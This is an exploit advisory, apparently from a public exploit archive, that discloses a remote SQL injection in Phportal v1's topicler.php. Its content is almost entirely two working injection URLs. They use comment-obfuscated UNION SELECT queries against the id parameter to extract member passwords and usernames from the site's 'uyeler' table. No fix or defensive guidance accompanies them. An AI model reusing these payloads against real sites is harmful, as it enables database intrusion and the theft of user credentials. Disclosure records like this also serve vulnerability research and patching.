id: 5379
date: 06/14/2009
title: phportal v1 (topicler.php id) Remote SQL Injection Vulnerability
author: xoron
cves: 

================================================================
phportal v1 (topicler.php id) Remote SQL Injection Vulnerability
================================================================


=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=
=                                 XORON 2009(C)
=
=              Phportal v1 Remote SQL Injection Vuln.      
=             
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=
= Script:   Phportal(http://phportal.mertindualari.com)
= Price:    Free
=
= Author: xoron
=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=
= BUGS   
=
=  Sql Injections:
=      /topicler.php?id=13/**/union/**/select/**/0,parola/**/from/**/uyeler/*
=      /topicler.php?id=13/**/union/**/select/**/0,kulladi/**/from/**/uyeler/*               
=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 




#  0day.today [2023-03-26]  #